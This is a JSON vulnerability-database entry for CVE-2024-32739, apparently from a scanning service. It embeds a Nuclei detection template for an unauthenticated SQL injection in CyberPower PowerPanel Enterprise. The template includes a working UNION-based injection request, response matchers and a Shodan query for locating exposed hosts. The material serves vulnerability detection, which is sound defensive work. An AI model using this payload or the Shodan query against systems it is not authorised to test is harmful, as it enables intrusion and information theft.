{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-32739/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-32739/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-32739/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-32739/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-32739/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-32739"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-32739"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-32739.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-32739\n\ninfo:\n  name: CyberPower < v2.8.3 - SQL Injection\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: |\n    An unauthenticated remote attacker can leak sensitive information via the \"query_ptask_verbose\" function within MCUDBHelper.\n  reference:\n    - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote\n    - https://www.tenable.com/security/research/tra-2024-14\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-32739\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-32739\n    epss-score: 0.05408\n    epss-percentile: 0.9234\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"<title>PDNU</title>\"\n  tags: cve,cve2024,cyberpower,sqli,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - ':\"finished\"'\n          - '\"results\":'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        group: 1\n        regex:\n          - '\"code\":\"([0-9.]+)\"'\n# digest: 4b0a00483046022100d58b51ed7c05c29d2d82758f6b0d281830dce58aa206bb050a7c99c58b6908e40221008c5d3b55e0b94b38af5aebb2c4cd2cda399546065bfae374fb9519822e57adbd:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-32739"
}